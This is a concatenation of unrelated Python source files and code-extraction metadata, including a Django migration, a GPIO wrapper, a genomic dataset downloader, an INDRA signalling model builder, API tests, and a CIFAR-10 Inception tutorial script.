cardinal_pythonlib.reprfunc import auto_repr\n'), ((29172, 29199), 'fnmatch.fnmatch', 'fnmatch', (['filename', 'globtext'], {}), '(filename, globtext)\n', (29179, 29199), False, 'from fnmatch import fnmatch\n'), ((29304, 29322), 'os.path.basename', 'basename', (['filename'], {}), '(filename)\n', (29312, 29322), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((29334, 29358), 'fnmatch.fnmatch', 'fnmatch', (['bname', 'globtext'], {}), '(bname, globtext)\n', (29341, 29358), False, 'from fnmatch import fnmatch\n'), ((31126, 31194), 'cardinal_pythonlib.fileops.relative_filename_within_dir', 'relative_filename_within_dir', (['source_filename', 'self.highest_code_dir'], {}), '(source_filename, self.highest_code_dir)\n', (31154, 31194), False, 'from cardinal_pythonlib.fileops import mkdir_p, relative_filename_within_dir\n'), ((31224, 31249), 'os.path.basename', 'basename', (['source_filename'], {}), '(source_filename)\n', (31232, 31249), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((32698, 32755), 'os.path.relpath', 'relpath', (['self.index_filename'], {'start': 'self.project_root_dir'}), '(self.index_filename, start=self.project_root_dir)\n', (32705, 32755), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7118, 7145), 'os.path.expanduser', 'expanduser', (['source_filename'], {}), '(source_filename)\n', (7128, 7145), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7187, 7215), 'os.path.expanduser', 'expanduser', (['project_root_dir'], {}), '(project_root_dir)\n', (7197, 7215), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7260, 7291), 'os.path.expanduser', 'expanduser', (['target_rst_filename'], {}), '(target_rst_filename)\n', (7270, 7291), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((8754, 8784), 'os.path.splitext', 'splitext', (['self.source_filename'], {}), '(self.source_filename)\n', (8762, 8784), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11078, 11096), 'os.path.splitext', 'splitext', (['filepath'], {}), '(filepath)\n', (11086, 11096), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11410, 11440), 'os.path.splitext', 'splitext', (['self.source_filename'], {}), '(self.source_filename)\n', (11418, 11440), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((11596, 11640), 'pygments.lexers.get_lexer_for_filename', 'get_lexer_for_filename', (['self.source_filename'], {}), '(self.source_filename)\n', (11618, 11640), False, 'from pygments.lexers import get_lexer_for_filename\n'), ((22502, 22528), 'os.path.expanduser', 'expanduser', (['index_filename'], {}), '(index_filename)\n', (22512, 22528), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22646, 22674), 'os.path.expanduser', 'expanduser', (['project_root_dir'], {}), '(project_root_dir)\n', (22656, 22674), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22720, 22752), 'os.path.expanduser', 'expanduser', (['autodoc_rst_root_dir'], {}), '(autodoc_rst_root_dir)\n', (22730, 22752), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22794, 22822), 'os.path.expanduser', 'expanduser', (['highest_code_dir'], {}), '(highest_code_dir)\n', (22804, 22822), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((28040, 28055), 'os.path.expanduser', 'expanduser', (['sfg'], {}), '(sfg)\n', (28050, 28055), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((28141, 28185), 'glob.glob', 'glob.glob', (['sfg_expanded'], {'recursive': 'recursive'}), '(sfg_expanded, recursive=recursive)\n', (28150, 28185), False, 'import glob\n'), ((31321, 31352), 'os.path.dirname', 'dirname', (['highest_code_to_target'], {}), '(highest_code_to_target)\n', (31328, 31352), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((7458, 7493), 'os.path.expanduser', 'expanduser', (['python_package_root_dir'], {}), '(python_package_root_dir)\n', (7468, 7493), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((10619, 10645), 'os.path.expanduser', 'expanduser', (['index_filename'], {}), '(index_filename)\n', (10629, 10645), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((22885, 22920), 'os.path.expanduser', 'expanduser', (['python_package_root_dir'], {}), '(python_package_root_dir)\n', (22895, 22920), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n'), ((33160, 33174), 'os.path.dirname', 'dirname', (['other'], {}), '(other)\n', (33167, 33174), False, 'from os.path import abspath, basename, dirname, exists, expanduser, isdir, isfile, join, relpath, sep, splitext\n')] |
# Generated by Django 2.1.3 on 2018-11-08 21:12
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('monsterapi', '0004_name'),
]
operations = [
migrations.AddField(
model_name='monster',
name='name',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='monsterapi.Name'),
),
]
| [
"django.db.models.ForeignKey"
] | [((355, 467), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'blank': '(True)', 'null': '(True)', 'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""monsterapi.Name"""'}), "(blank=True, null=True, on_delete=django.db.models.\n deletion.CASCADE, to='monsterapi.Name')\n", (372, 467), False, 'from django.db import migrations, models\n')] |
import pandas as pd
from wikidataintegrator import wdi_login
import utils
from login import WDPASS, WDUSER
import argparse
import sys
parser = argparse.ArgumentParser()
df = utils.get_complex_portal_species_ids()
print(df.to_markdown()) | [
"utils.get_complex_portal_species_ids",
"argparse.ArgumentParser"
] | [((144, 169), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (167, 169), False, 'import argparse\n'), ((175, 213), 'utils.get_complex_portal_species_ids', 'utils.get_complex_portal_species_ids', ([], {}), '()\n', (211, 213), False, 'import utils\n')] |
import cv2
print(cv2.getBuildInformation())
| [
"cv2.getBuildInformation"
] | [((18, 43), 'cv2.getBuildInformation', 'cv2.getBuildInformation', ([], {}), '()\n', (41, 43), False, 'import cv2\n')] |
# =============================================================================
# System imports
import logging
import RPi.GPIO as RPiGPIO
# =============================================================================
# Logger setup
logger = logging.getLogger(__name__)
# =============================================================================
# Classes
class GPIO:
IN = 0
OUT = 1
_initialized = False
def __init__(self,name,channel,inout,default_value=0,active_high=True,debug=False):
self._name = name
self._channel = channel
self._inout = inout
self._active_high = active_high
self._debug = debug
logger.debug('Initializing GPIO {:<10} channel={} inout={} default={} active_high={} debug={}'
.format( self._name
, self._channel
, "in" if inout == GPIO.IN else "out"
, default_value
, self._active_high
, self._debug ))
if self._debug == False:
if GPIO._initialized == False:
self._initialize()
rpigpio_inout = RPiGPIO.IN if inout == GPIO.IN else RPiGPIO.OUT
initial_state = None
if inout == GPIO.IN:
RPiGPIO.setup( self._channel
, rpigpio_inout )
else:
initial_state = RPiGPIO.LOW
if (self._active_high == True and default_value == 1) or \
(self._active_high == False and default_value == 0):
initial_state = RPiGPIO.HIGH
RPiGPIO.setup( self._channel
, rpigpio_inout
, initial=initial_state)
def __del__(self):
if self._debug == False:
RPiGPIO.cleanup( self._channel )
def _initialize(self):
logger.debug('Initializing RpiGPIO module')
RPiGPIO.setmode(RPiGPIO.BOARD)
GPIO._initialized = True
def set(self,value):
if self._inout == GPIO.IN:
logger.error('Can\'t set input GPIO {}'.format(self._name))
else:
physical_value = value if self._active_high == True else not value
logger.debug('Setting GPIO {:<10} to {} (logical value)'.format(self._name,1 if value else 0))
if self._debug == False:
RPiGPIO.output( self._channel, physical_value )
| [
"logging.getLogger",
"RPi.GPIO.cleanup",
"RPi.GPIO.setup",
"RPi.GPIO.output",
"RPi.GPIO.setmode"
] | [((244, 271), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (261, 271), False, 'import logging\n'), ((1945, 1975), 'RPi.GPIO.setmode', 'RPiGPIO.setmode', (['RPiGPIO.BOARD'], {}), '(RPiGPIO.BOARD)\n', (1960, 1975), True, 'import RPi.GPIO as RPiGPIO\n'), ((1824, 1854), 'RPi.GPIO.cleanup', 'RPiGPIO.cleanup', (['self._channel'], {}), '(self._channel)\n', (1839, 1854), True, 'import RPi.GPIO as RPiGPIO\n'), ((1282, 1325), 'RPi.GPIO.setup', 'RPiGPIO.setup', (['self._channel', 'rpigpio_inout'], {}), '(self._channel, rpigpio_inout)\n', (1295, 1325), True, 'import RPi.GPIO as RPiGPIO\n'), ((1629, 1695), 'RPi.GPIO.setup', 'RPiGPIO.setup', (['self._channel', 'rpigpio_inout'], {'initial': 'initial_state'}), '(self._channel, rpigpio_inout, initial=initial_state)\n', (1642, 1695), True, 'import RPi.GPIO as RPiGPIO\n'), ((2395, 2440), 'RPi.GPIO.output', 'RPiGPIO.output', (['self._channel', 'physical_value'], {}), '(self._channel, physical_value)\n', (2409, 2440), True, 'import RPi.GPIO as RPiGPIO\n')] |
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
from indra.statements import *
from indra.preassembler.grounding_mapper import GroundingMapper, \
default_grounding_map
def get_statements():
statements = []
egf = Agent('EGF')
egfr = Agent('EGFR')
st = Complex([egf, egfr])
statements.append(st)
egfre = Agent('EGFR', bound_conditions=[BoundCondition(egf, True)])
egfre = Agent('EGFR', bound_conditions=[BoundCondition(egf, True)])
st = Complex([egfre, egfre])
statements.append(st)
egfrdimer = Agent('EGFR', bound_conditions=[BoundCondition(egfr, True)])
st = Transphosphorylation(egfrdimer, 'Y')
statements.append(st)
egfrpY = Agent('EGFR', mods=[ModCondition('phosphorylation', 'Y')])
grb2 = Agent('GRB2')
st = Complex([egfrpY, grb2])
statements.append(st)
grb2bound = Agent('GRB2', bound_conditions=[BoundCondition(egfr, True)])
sos1 = Agent('SOS1')
st = Complex([grb2bound, sos1])
statements.append(st)
hras = Agent('HRAS')
kras = Agent('KRAS')
nras = Agent('NRAS')
gdp = Agent('GDP')
for ras in [hras, kras, nras]:
st = Complex([ras, gdp])
statements.append(st)
sos1bound = Agent('SOS1', bound_conditions=[BoundCondition(grb2, True)])
hras_gdp = Agent('HRAS', bound_conditions=[BoundCondition(gdp, True)])
kras_gdp = Agent('KRAS', bound_conditions=[BoundCondition(gdp, True)])
nras_gdp = Agent('NRAS', bound_conditions=[BoundCondition(gdp, True)])
for ras_gdp in [hras_gdp, kras_gdp, nras_gdp]:
st = Complex([sos1bound, ras_gdp])
statements.append(st)
st = ActiveForm(ras_gdp, 'activity', False)
statements.append(st)
hras_bound = Agent('HRAS', bound_conditions=[BoundCondition(sos1, True)])
kras_bound = Agent('KRAS', bound_conditions=[BoundCondition(sos1, True)])
nras_bound = Agent('NRAS', bound_conditions=[BoundCondition(sos1, True)])
sos1bound = Agent('SOS1', bound_conditions=[BoundCondition(grb2, True)])
for ras_bound in [hras_bound, kras_bound, nras_bound]:
st = Complex([sos1bound, ras_bound])
statements.append(st)
gtp = Agent('GTP')
hras_gtp = Agent('HRAS', bound_conditions=[BoundCondition(gtp, True)])
kras_gtp = Agent('KRAS', bound_conditions=[BoundCondition(gtp, True)])
nras_gtp = Agent('NRAS', bound_conditions=[BoundCondition(gtp, True)])
braf = Agent('BRAF')
for ras_gtp in [hras_gtp, kras_gtp, nras_gtp]:
st = Complex([ras_gtp, braf])
statements.append(st)
st = ActiveForm(ras_gtp, 'activity', True)
statements.append(st)
hras_braf = Agent('BRAF', bound_conditions=[BoundCondition(hras, True)])
kras_braf = Agent('BRAF', bound_conditions=[BoundCondition(kras, True)])
nras_braf = Agent('BRAF', bound_conditions=[BoundCondition(nras, True)])
for braf1 in [hras_braf, kras_braf, nras_braf]:
for braf2 in [hras_braf, kras_braf, nras_braf]:
st = Complex([braf1, braf2])
statements.append(st)
braf_bound = Agent('BRAF', bound_conditions=[BoundCondition(braf, True)])
st = Transphosphorylation(braf_bound)
statements.append(st)
braf_phos = Agent('BRAF', mods=[ModCondition('phosphorylation')])
mek1 = Agent('MAP2K1')
mek2 = Agent('MAP2K2')
st = ActiveForm(braf_phos, 'kinase', True)
statements.append(st)
st = Phosphorylation(braf_phos, mek1)
statements.append(st)
st = Phosphorylation(braf_phos, mek2)
statements.append(st)
mek1_phos = Agent('MAP2K1', mods=[ModCondition('phosphorylation')])
mek2_phos = Agent('MAP2K2', mods=[ModCondition('phosphorylation')])
mapk1 = Agent('MAPK1')
mapk3 = Agent('MAPK3')
st = ActiveForm(mek1_phos, 'kinase', True)
statements.append(st)
st = ActiveForm(mek2_phos, 'kinase', True)
statements.append(st)
st = Phosphorylation(braf_phos, mek1)
statements.append(st)
st = Phosphorylation(braf_phos, mek2)
statements.append(st)
for mek in [mek1_phos, mek2_phos]:
for erk in [mapk1, mapk3]:
st = Phosphorylation(mek, erk)
for st in statements:
st.belief = 1
st.evidence.append(Evidence(source_api='assertion'))
# Update the statements with grounding info. To do this, we set the "text"
# field of the db_refs to copy from the agent name, then run the grounding
# mapper
for st in statements:
for ag in st.agent_list():
if ag is None:
continue
else:
ag.db_refs = {'TEXT': ag.name}
# Now load the grounding map and run
gm = GroundingMapper(default_grounding_map)
mapped_stmts = gm.map_agents(statements)
# This shouldn't change anything, but just in case...
renamed_stmts = gm.rename_agents(mapped_stmts)
return renamed_stmts
| [
"indra.preassembler.grounding_mapper.GroundingMapper"
] | [((4729, 4767), 'indra.preassembler.grounding_mapper.GroundingMapper', 'GroundingMapper', (['default_grounding_map'], {}), '(default_grounding_map)\n', (4744, 4767), False, 'from indra.preassembler.grounding_mapper import GroundingMapper, default_grounding_map\n')] |
import unittest
import base_test
import json
class PrincipalClaimTest(base_test.BaseTest):
def setUp(self):
super(PrincipalClaimTest, self).setUp()
self._org = self.post('/api/orgs', {"name":"claim_org", "url":"https://myorg.com"})
self._principal = self.post('/api/orgs/%s/principals' % self._org["id"], {"username":"my_principal", "organization_id":self._org["id"]})
self._realm = self.post('/api/realms', {"id":"resource_realm"})
self._license = self.post('/api/orgs/%s/licenses' % self._org["id"], {"name":"my_license", "organization_id":self._org["id"], "effective_at": "2019-01-01T00:00:00", "expired_at": "2030-01-01T00:00:00"})
self._resource = self.post('/api/realms/%s/resources' % self._realm["id"], {"resource_name":"my_resource", "realm_id":self._realm["id"]})
def tearDown(self):
self.delete('/api/realms/%s/resources/%s/claims/%s' % (self._realm["id"], self._resource["id"], self._claim["id"]))
self.delete('/api/orgs/%s/licenses/%s' % (self._org["id"], self._license["id"]))
self.delete('/api/realms/%s/resources/%s' % (self._realm["id"], self._resource["id"]))
self.delete('/api/realms/%s' % self._realm["id"])
self.delete('/api/orgs/%s' % self._org["id"])
self.delete('/api/orgs/%s/principals/%s' % (self._org["id"], self._principal["id"]))
def test_add_remove_claim_to_principal(self):
self._claim = self.post('/api/realms/%s/resources/%s/claims' % (self._realm["id"], self._resource["id"]), {"action":"READ", "realm_id":self._realm["id"]})
self.assertEquals("READ", self._claim["action"])
#
resp = self.put('/api/realms/%s/resources/%s/claims/%s/principals/%s' % (self._realm["id"], self._resource["id"], self._claim["id"], self._principal["id"]), {})
self.assertEquals(1, resp, json.dumps(resp))
resp = self.delete('/api/realms/%s/resources/%s/claims/%s/principals/%s' % (self._realm["id"], self._resource["id"], self._claim["id"], self._principal["id"]))
self.assertEquals(1, resp, json.dumps(resp))
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"json.dumps"
] | [((2122, 2137), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2135, 2137), False, 'import unittest\n'), ((1851, 1867), 'json.dumps', 'json.dumps', (['resp'], {}), '(resp)\n', (1861, 1867), False, 'import json\n'), ((2072, 2088), 'json.dumps', 'json.dumps', (['resp'], {}), '(resp)\n', (2082, 2088), False, 'import json\n')] |
import pandas as pd
import yaml
import gzip
import re
import urllib
import shutil # for removing and creating folders
from pathlib import Path
from tqdm.autonotebook import tqdm
import warnings
from Bio import SeqIO
from Bio.Seq import Seq
from .cloud_caching import CLOUD_CACHE, download_from_cloud_cache
CACHE_PATH = Path.home() / '.genomic_benchmarks'
REF_CACHE_PATH = CACHE_PATH / 'fasta'
DATASET_DIR_PATH = (Path(__file__).parents[0] / '..' / '..' / '..' / 'datasets').resolve()
def download_dataset(interval_list_dataset, version=None, dest_path=CACHE_PATH, cache_path=REF_CACHE_PATH,
force_download=False, use_cloud_cache=True):
'''
Transform an interval-list genomic dataset into a full-seq genomic dataset.
Parameters:
interval_list_dataset (str or Path): Either a path or a name of dataset included in this package.
version (int): Version of the dataset.
dest_path (str or Path): Folder to store the full-seq dataset.
cache_path (str or Path): Folder to store the downloaded references.
force_download (bool): If True, force downloading of references.
use_cloud_cache (bool): If True, use the cloud cache for downloading a full-seq genomic datasets.
Returns:
seq_dataset_path (Path): Path to the full-seq dataset.
'''
interval_list_dataset = _guess_location(interval_list_dataset)
metadata = _check_dataset_existence(interval_list_dataset, version)
dataset_name = _get_dataset_name(interval_list_dataset)
if version is None:
version = metadata['version']
if use_cloud_cache and ((dataset_name, version) in CLOUD_CACHE):
Path(dest_path).mkdir(parents=True, exist_ok=True) # to be sure "./.genomic_benchmarks" exists
return download_from_cloud_cache((dataset_name, version), Path(dest_path) / dataset_name)
refs = _download_references(metadata, cache_path=cache_path, force=force_download)
fastas = _load_fastas_into_memory(refs, cache_path=cache_path)
_remove_and_create(Path(dest_path) / dataset_name)
_remove_and_create(Path(dest_path) / dataset_name / "train")
_remove_and_create(Path(dest_path) / dataset_name / "test")
for c in metadata['classes']:
for t in ['train', 'test']:
dt_filename = Path(interval_list_dataset) / t / (c + '.csv.gz')
dt = pd.read_csv(dt_filename, compression="gzip")
ref_name = _get_reference_name(metadata['classes'][c]['url'])
dt['seq'] = _fill_seq_column(fastas[ref_name], dt)
folder_filename = Path(dest_path) / dataset_name / t / c
_remove_and_create(folder_filename)
for row in dt.iterrows():
row_filename = folder_filename / (str(row[1]['id']) + '.txt')
row_filename.write_text(row[1]['seq'])
return Path(dest_path) / dataset_name
def _guess_location(dataset_path):
if Path(dataset_path).exists():
return Path(dataset_path)
elif (DATASET_DIR_PATH / str(dataset_path)).exists():
return DATASET_DIR_PATH / str(dataset_path)
else:
raise FileNotFoundError(f'Dataset {dataset_path} not found.')
def _check_dataset_existence(interval_list_dataset, version):
# check that the dataset exists, returns its metadata
path = Path(interval_list_dataset)
if not path.exists():
raise FileNotFoundError(f'Dataset {interval_list_dataset} not found.')
metadata_path = path / 'metadata.yaml'
if not metadata_path.exists():
raise FileNotFoundError(f'Dataset {interval_list_dataset} does not contain `metadata.yaml` file.')
with open(metadata_path, "r") as fr:
metadata = yaml.safe_load(fr)
if version is not None:
if version != metadata['version']:
raise ValueError(f"Dataset version {version} does not match the version in metadata {metadata['version']}.")
else:
warnings.warn(f"No version specified. Using version {metadata['version']}.")
return metadata
def _get_dataset_name(path):
# get the dataset name from the path
return Path(path).stem
def _download_references(metadata, cache_path, force=False):
# download all references from the metadata into cache_path folder
cache_path = Path(cache_path)
if not cache_path.exists():
cache_path.mkdir(parents=True)
refs = {(c['url'], c['type'], c.get('extra_processing')) for c in metadata['classes'].values()}
for ref in refs:
ref_path = cache_path / _get_reference_name(ref[0])
if not ref_path.exists() or force:
_download_url(ref[0], ref_path)
else:
print(f'Reference {ref_path} already exists. Skipping.')
return refs
def _get_reference_name(url):
# get the reference name from the url
### TODO: better naming scheme (e.g. taking the same file from 2 Ensembl releases)
return url.split('/')[-1]
def _download_url(url, dest):
# download a file from url to dest
if Path(dest).exists():
Path(dest).unlink()
print(f"Downloading {url}")
class DownloadProgressBar(tqdm):
# for progress bar
def update_to(self, b=1, bsize=1, tsize=None):
if tsize is not None:
self.total = tsize
self.update(b * bsize - self.n)
with DownloadProgressBar(unit='B', unit_scale=True,
miniters=1, desc=str(dest)) as t:
# TODO: adapt fastdownload code instead of urllib
urllib.request.urlretrieve(url, filename=dest, reporthook=t.update_to)
EXTRA_PREPROCESSING = {
# known extra preprocessing steps
'default': [None, None, lambda x: x],
'ENSEMBL_HUMAN_GENOME': [24, 'MT', lambda x: "chr"+x], # use only chromosomes, not contigs, and add chr prefix
'ENSEMBL_MOUSE_GENOME': [21, 'MT', lambda x: "chr"+x], # use only chromosomes, not contigs, and add chr prefix
'ENSEMBL_HUMAN_TRANSCRIPTOME': [190_000, None, lambda x: re.sub("ENST([0-9]*)[.][0-9]*", "ENST\\1", x)] # remove the version number from the ensembl id
}
def _load_fastas_into_memory(refs, cache_path):
# load all references into memory
fastas = {}
for ref in refs:
ref_path = Path(cache_path) / _get_reference_name(ref[0])
ref_type = ref[1]
ref_extra_preprocessing = ref[2] if ref[2] is not None else "default"
if ref_extra_preprocessing not in EXTRA_PREPROCESSING:
raise ValueError(f"Unknown extra preprocessing: {ref_extra_preprocessing}")
if ref_type == 'fa.gz':
fasta = _fastagz2dict(ref_path, fasta_total=EXTRA_PREPROCESSING[ref_extra_preprocessing][0],
stop_id=EXTRA_PREPROCESSING[ref_extra_preprocessing][1],
region_name_transform=EXTRA_PREPROCESSING[ref_extra_preprocessing][2])
fastas[_get_reference_name(ref[0])] = fasta
else:
raise ValueError(f'Unknown reference type {ref_type}')
return fastas
def _fastagz2dict(fasta_path, fasta_total=None, stop_id=None, region_name_transform=lambda x: x):
# load gzipped fasta into dictionary
fasta = {}
with gzip.open(fasta_path, "rt") as handle:
for record in tqdm(SeqIO.parse(handle, "fasta"), total=fasta_total):
fasta[region_name_transform(record.id)] = str(record.seq)
if stop_id and (record.id == stop_id):
# stop, do not read small contigs
break
return fasta
def _fill_seq_column(fasta, df):
# fill seq column in DataFrame tab
if not all([r in fasta for r in df['region']]):
missing_regions = list({r for r in df['region'] if r not in fasta})
if len(missing_regions) > 5: missing_regions = missing_regions[:6]
raise ValueError('Some regions not found in the reference, e.g. ' + " ".join([str(r) for r in missing_regions]))
output = pd.Series([_rev(fasta[region][start:end], strand) for region, start, end, strand in zip(df['region'], df['start'], df['end'], df['strand'])])
return output
def _rev(seq, strand):
# reverse complement
if strand == '-':
return str(Seq(seq).reverse_complement())
else:
return seq
def _remove_and_create(path):
# cleaning step: remove the folder and then create it again
if path.exists():
shutil.rmtree(path)
path.mkdir(parents=True)
def remove_dataset_from_disk(interval_list_dataset, version=None, dest_path=CACHE_PATH):
'''
Remove the full-seq dataset from the disk.
Parameters:
interval_list_dataset (str or Path): Either a path or a name of dataset included in this package.
version (int): Version of the dataset.
dest_path (str or Path): Folder to store the full-seq dataset.
'''
interval_list_dataset = _guess_location(interval_list_dataset)
metadata = _check_dataset_existence(interval_list_dataset, version)
dataset_name = _get_dataset_name(interval_list_dataset)
path = Path(dest_path) / dataset_name
if path.exists():
shutil.rmtree(path) | [
"pandas.read_csv",
"urllib.request.urlretrieve",
"pathlib.Path",
"gzip.open",
"pathlib.Path.home",
"Bio.Seq.Seq",
"yaml.safe_load",
"Bio.SeqIO.parse",
"shutil.rmtree",
"warnings.warn",
"re.sub"
] | [((323, 334), 'pathlib.Path.home', 'Path.home', ([], {}), '()\n', (332, 334), False, 'from pathlib import Path\n'), ((3420, 3447), 'pathlib.Path', 'Path', (['interval_list_dataset'], {}), '(interval_list_dataset)\n', (3424, 3447), False, 'from pathlib import Path\n'), ((4375, 4391), 'pathlib.Path', 'Path', (['cache_path'], {}), '(cache_path)\n', (4379, 4391), False, 'from pathlib import Path\n'), ((2959, 2974), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2963, 2974), False, 'from pathlib import Path\n'), ((3078, 3096), 'pathlib.Path', 'Path', (['dataset_path'], {}), '(dataset_path)\n', (3082, 3096), False, 'from pathlib import Path\n'), ((3799, 3817), 'yaml.safe_load', 'yaml.safe_load', (['fr'], {}), '(fr)\n', (3813, 3817), False, 'import yaml\n'), ((4029, 4105), 'warnings.warn', 'warnings.warn', (['f"""No version specified. Using version {metadata[\'version\']}."""'], {}), '(f"No version specified. Using version {metadata[\'version\']}.")\n', (4042, 4105), False, 'import warnings\n'), ((4209, 4219), 'pathlib.Path', 'Path', (['path'], {}), '(path)\n', (4213, 4219), False, 'from pathlib import Path\n'), ((5609, 5679), 'urllib.request.urlretrieve', 'urllib.request.urlretrieve', (['url'], {'filename': 'dest', 'reporthook': 't.update_to'}), '(url, filename=dest, reporthook=t.update_to)\n', (5635, 5679), False, 'import urllib\n'), ((7283, 7310), 'gzip.open', 'gzip.open', (['fasta_path', '"""rt"""'], {}), "(fasta_path, 'rt')\n", (7292, 7310), False, 'import gzip\n'), ((8476, 8495), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (8489, 8495), False, 'import shutil\n'), ((9175, 9190), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (9179, 9190), False, 'from pathlib import Path\n'), ((9236, 9255), 'shutil.rmtree', 'shutil.rmtree', (['path'], {}), '(path)\n', (9249, 9255), False, 'import shutil\n'), ((2146, 2161), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2150, 2161), False, 'from pathlib import Path\n'), ((2471, 2515), 'pandas.read_csv', 'pd.read_csv', (['dt_filename'], {'compression': '"""gzip"""'}), "(dt_filename, compression='gzip')\n", (2482, 2515), True, 'import pandas as pd\n'), ((3034, 3052), 'pathlib.Path', 'Path', (['dataset_path'], {}), '(dataset_path)\n', (3038, 3052), False, 'from pathlib import Path\n'), ((5108, 5118), 'pathlib.Path', 'Path', (['dest'], {}), '(dest)\n', (5112, 5118), False, 'from pathlib import Path\n'), ((6078, 6123), 're.sub', 're.sub', (['"""ENST([0-9]*)[.][0-9]*"""', '"""ENST\\\\1"""', 'x'], {}), "('ENST([0-9]*)[.][0-9]*', 'ENST\\\\1', x)\n", (6084, 6123), False, 'import re\n'), ((6319, 6335), 'pathlib.Path', 'Path', (['cache_path'], {}), '(cache_path)\n', (6323, 6335), False, 'from pathlib import Path\n'), ((7349, 7377), 'Bio.SeqIO.parse', 'SeqIO.parse', (['handle', '"""fasta"""'], {}), "(handle, 'fasta')\n", (7360, 7377), False, 'from Bio import SeqIO\n'), ((1773, 1788), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (1777, 1788), False, 'from pathlib import Path\n'), ((1935, 1950), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (1939, 1950), False, 'from pathlib import Path\n'), ((2201, 2216), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2205, 2216), False, 'from pathlib import Path\n'), ((2266, 2281), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2270, 2281), False, 'from pathlib import Path\n'), ((5137, 5147), 'pathlib.Path', 'Path', (['dest'], {}), '(dest)\n', (5141, 5147), False, 'from pathlib import Path\n'), ((2404, 2431), 'pathlib.Path', 'Path', (['interval_list_dataset'], {}), '(interval_list_dataset)\n', (2408, 2431), False, 'from pathlib import Path\n'), ((8291, 8299), 'Bio.Seq.Seq', 'Seq', (['seq'], {}), '(seq)\n', (8294, 8299), False, 'from Bio.Seq import Seq\n'), ((2685, 2700), 'pathlib.Path', 'Path', (['dest_path'], {}), '(dest_path)\n', (2689, 2700), False, 'from pathlib import Path\n'), ((417, 431), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (421, 431), False, 'from pathlib import Path\n')] |
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import time
from datetime import timedelta
import os
# Importing a helper module for the functions of the Inception model.
import inception
import cifar10
from cifar10 import num_classes
from inception import transfer_values_cache
#Importing the color map for plotting each class with different color.
import matplotlib.cm as color_map
from sklearn.decomposition import PCA
from sklearn.manifold import TSNE
from sklearn.metrics import confusion_matrix
cifar10.data_path = "data/CIFAR-10/"
cifar10.maybe_download_and_extract()
class_names = cifar10.load_class_names()
print(class_names)
print('Loading the training set...')
training_images, training_cls_integers, trainig_one_hot_labels = cifar10.load_training_data()
print('Loading the test set...')
testing_images, testing_cls_integers, testing_one_hot_labels = cifar10.load_test_data()
print("-Number of images in the training set:\t\t{}".format(len(training_images)))
print("-Number of images in the testing set:\t\t{}".format(len(testing_images)))
def plot_imgs(imgs, true_class, predicted_class=None):
assert len(imgs) == len(true_class)
# Creating a placeholders for 9 subplots
fig, axes = plt.subplots(3, 3)
# Adjustting spacing.
if predicted_class is None:
hspace = 0.3
else:
hspace = 0.6
fig.subplots_adjust(hspace=hspace, wspace=0.3)
for i, ax in enumerate(axes.flat):
# There may be less than 9 images, ensure it doesn't crash.
if i < len(imgs):
# Plot image.
ax.imshow(imgs[i],
interpolation='nearest')
# Get the actual name of the true class from the class_names array
true_class_name = class_names[true_class[i]]
# Showing labels for the predicted and true classes
if predicted_class is None:
xlabel = "True: {0}".format(true_class_name)
else:
# Name of the predicted class.
predicted_class_name = class_names[predicted_class[i]]
xlabel = "True: {0}\nPred: {1}".format(true_class_name, predicted_class_name)
ax.set_xlabel(xlabel)
# Remove ticks from the plot.
ax.set_xticks([])
ax.set_yticks([])
plt.show()
# get the first 9 images in the test set
imgs = testing_images[0:9]
# Get the integer representation of the true class.
true_class = testing_cls_integers[0:9]
# Plotting the images
plot_imgs(imgs=imgs, true_class=true_class)
print('Downloading the pretrained inception v3 model')
